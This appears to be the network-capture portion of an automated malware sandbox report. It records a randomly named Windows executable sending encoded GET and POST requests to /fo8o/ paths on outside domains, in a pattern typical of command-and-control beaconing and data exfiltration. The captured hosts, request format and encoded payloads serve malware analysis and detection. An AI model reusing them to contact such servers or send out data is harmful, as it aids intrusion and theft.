38 6c 73 52 34 6a 4d 46 45 5a 44 74 46 6a 56 31 37 49 74 76 77 7a 37 70 32 6d 71 65 68 39 34 41 55 4a 32 49 6d 78 36 44 6e 55 47 68 44 4d 35 70 4a 54 49 32 35 79 30 6a 66 54 6d 42 59 6b 2f 53 61 48 52 73 38 43 47 69 4e 45 61 36 57 6d 72 31 64 6b 39 78 5a 4e 54 62 36 6f 69 62 51 34 45 37 4e 4a 73 55 67 52 74 51 31 4a 30 71 57 39 68 58 6b 61 48 62 6f 66 6a 7a 58 37 31 2f 64 2f 43 6e 34 67 48 69 74 4e 39 73 7a 4d 6d 34 6a 52 33 37 6a 55 4e 65 68 65 67 31 57 48 5a 58 43 33 46 36 30 46 76 73 65 4d 2b 72 35 50 31 63 6c 6c 38 35 6e 2f 38 71 73 5a 44 51 71 37 4a 72 6c 33 4e 79 49 51 42 33 6e 35 6c 76 4a 76 33 59 70 65 6b 35 51 64 6a 55 51 7a 48 6a 52 39 67 6e 53 38 73 36 31 62 51 69 5a 77 6a 55 2b 2f 72 78 7a 32 78 47 77 64 4f 4b 4a 47 4b 48 70 55 73 54 31 63 41 44 44 4e 43 4c 5a 59 6a 6a 6f 59 5a 41 64 31 54 4d 55 76 38 53 58 6f 48 69 30 43 6f 31 76 67 65 2b 37 64 4a 33 6f 32 61 48 36 56 71 6a 42 68 77 6a 66 71 56 37 79 54 4a 52 6a 4a 72 64 61 65 38 57 53 54 49 50 33 75 68 31 79 50 52 68 56 71 7a 66 63 77 54 66 76 71 6f 79 79 2f 36 69 54 45 62 66 33 2f 49 74 30 61 6d 31 31 7a 57 52 62 45 74 64 6c 69 62 4c 53 5a 78 58 4a 51 74 30 77 62 4c 46 4e 35 6f 78 52 4b 69 58 67 57 41 6d 6c 67 62 57 68 56 65 5a 6f 74 62 7a 54 44 7a 77 42 75 46 64 75 47 78 74 61 75 72 69 66 41 70 75 32 41 4c 45 2f 6f 76 38 34 32 67 76 59 55 45 3d Data Ascii: OVFPBtpp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gYQ3T/XolIzmoKygd3avR1fGEyifnYiOmlgNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC7ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdGN+BuOOAs4Lkir5hC28h2VCW7N63dm4PkACzu1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvc/mwlEQqVN8sDqCclvTEA8PQZDkUqYvAt6bc2uMPldWMDMMjWKljpN+f43+WYphYD3frJIA07OfQD7qkklIn9A7m9F+97DMSJAUaztAjPdhRkUprNEZ0lx/4KDW3FzPEkIRyK1ay8+h0/DhtBP5wVdiGMZSfwbUdjQBOQWPJD2EsRPeS+o0mZnRUDmlvf2jzcm3zg5KZsa1Co+krN88UOq7PSV9IS9yGS9dWzkE28j6aUwW3VuE34YDrgP/9P7Q86Ie2t+fgb6ny3H8aMdt9szpOnAPv/it4V9yA4ncSaPiob8lsR4jMFEZDtFjV17Itvwz7p2mqeh94AUJ2Imx6DnUGhDM5pJTI25y0jfTmBYk/SaHRs8CGiNEa6Wmr1dk9xZNTb6oibQ4E7NJsUgRtQ1J0qW9hXkaHbofjzX71/d/Cn4gHitN9szMm4jR37jUNeheg1WHZXC3F60FvseM+r5P1cll85n/8qsZDQq7Jrl3NyIQB3n5lvJv3Ypek5QdjUQzHjR9gnS8s61bQiZwjU+/rxz2xGwdOKJGKHpUsT1cADDNCLZYjjoYZAd1TMUv8SXoHi0Co1vge+7dJ3o2aH6VqjBhwjfqV7yTJRjJrdae8WSTIP3uh1yPRhVqzfcwTfvqoyy/6iTEbf3/It0am11zWRbEtdlibLSZxXJQt0wbLFN5oxRKiXgWAmlgbWhVeZotbzTDzwBuFduGxtaurifApu2ALE/ov842gvYUE=
Apr 26, 2024 10:08:15.091285944 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Fri, 26 Apr 2024 08:08:14 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49730	91.195.240.94	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:17.626749992 CEST	508	OUT	GET /fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:08:17.931377888 CEST	1289	IN	HTTP/1.1 200 OK date: Fri, 26 Apr 2024 08:08:17 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_iGrAuYk95BFm0gnGm/9J5FCahgxfRMxW7VwVI5GlPWjfAgyxe4L+FuD2EvvvCO8sdfiC3+4NmzjRLfayJJpyGQ== last-modified: Fri, 26 Apr 2024 08:08:17 GMT x-cache-miss-from: parking-7cbf88ff6b-7flh7 server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 69 47 72 41 75 59 6b 39 35 42 46 6d 30 67 6e 47 6d 2f 39 4a 35 46 43 61 68 67 78 66 52 4d 78 57 37 56 77 56 49 35 47 6c 50 57 6a 66 41 67 79 78 65 34 4c 2b 46 75 44 32 45 76 76 76 43 4f 38 73 64 66 69 43 33 2b 34 4e 6d 7a 6a 52 4c 66 61 79 4a 4a 70 79 47 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e 65 77 73 63 61 73 74 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_iGrAuYk95BFm0gnGm/9J5FCahgxfRMxW7VwVI5GlPWjfAgyxe4L+FuD2EvvvCO8sdfiC3+4NmzjRLfayJJpyGQ==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the information youre looking for. From gen
Apr 26, 2024 10:08:17.931438923 CEST	1289	IN	Data Raw: 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 20 68 61 73 20 69 74 20 Data Ascii: eral topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you findAEC what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/s
Apr 26, 2024 10:08:17.931508064 CEST	1289	IN	Data Raw: 6d 7d 61 75 64 69 6f 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 Data Ascii: m}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,in
Apr 26, 2024 10:08:17.931555033 CEST	1289	IN	Data Raw: 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e Data Ascii: lay:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container
Apr 26, 2024 10:08:17.931633949 CEST	1289	IN	Data Raw: 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 Data Ascii: {content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;te
Apr 26, 2024 10:08:17.931700945 CEST	1289	IN	Data Raw: 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 Data Ascii: :underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-l
Apr 26, 2024 10:08:17.931749105 CEST	1289	IN	Data Raw: 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 Data Ascii: r-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{p
Apr 26, 2024 10:08:17.931786060 CEST	1289	IN	Data Raw: 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 65 6d 7d Data Ascii: inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body t
Apr 26, 2024 10:08:17.931859970 CEST	1289	IN	Data Raw: 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 7d 2e 73 77 69 74 63 68 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 Data Ascii: initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.
Apr 26, 2024 10:08:17.931921959 CEST	1289	IN	Data Raw: 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 Data Ascii: ey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_iGrAuYk95BFm0gnGm/9J5FCahgxfRMxW7VwVI5GlPWjfAgyxe4L+FuD2EvvvCO8sdfiC3+4NmzjRLfayJJpyGQ==","t
Apr 26, 2024 10:08:18.173758030 CEST	1289	IN	Data Raw: 44 25 33 44 22 2c 22 61 6c 74 65 72 6e 61 74 65 22 3a 22 4f 41 6b 30 4e 6d 56 6a 5a 44 59 32 4e 7a 68 6b 5a 54 6c 6c 5a 6d 4a 68 4f 54 64 6d 4d 44 5a 69 4d 6a 64 6d 4e 6a 4e 6a 4e 7a 41 78 4e 51 6b 78 4d 6a 45 77 43 54 45 7a 43 54 41 4a 43 54 55 Data Ascii: D%3D","alternate":"OAk0NmVjZDY2NzhkZTllZmJhOTdmMDZiMjdmNjNjNzAxNQkxMjEwCTEzCTAJCTUxODY4MDUyOAlyc3NuZXdzY2FzdAkzMDQ5CTEJNQk1OQkxNzE0MTE4ODk3CTAJTgkwCTAJMAkxMjA1CTE0NjEwMTYxNwkxMDIuMTI5LjE1Mi4yMjAJMA%3D%3D"},"visitorViewIdJsAds":"MWI1ZTEyMWViNDU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49731	66.29.149.46	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:32.174668074 CEST	774	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 4a 73 72 71 61 53 64 72 63 68 63 50 52 57 46 59 34 57 4d 76 6b 43 39 6e 39 47 5a 2b Data Ascii: OVFPBtpp=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsrqaSdrchcPRWFY4WMvkC9n9GZ+
Apr 26, 2024 10:08:32.378321886 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:32 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49732	66.29.149.46	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:34.892963886 CEST	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 36 68 51 57 76 62 6a 41 46 57 58 33 2b 34 52 52 52 74 48 4a 58 4a 50 64 67 77 3d 3d Data Ascii: OVFPBtpp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9A6hQWvbjAFWX3+4RRRtHJXJPdgw==
Apr 26, 2024 10:08:35.100095034 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:34 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 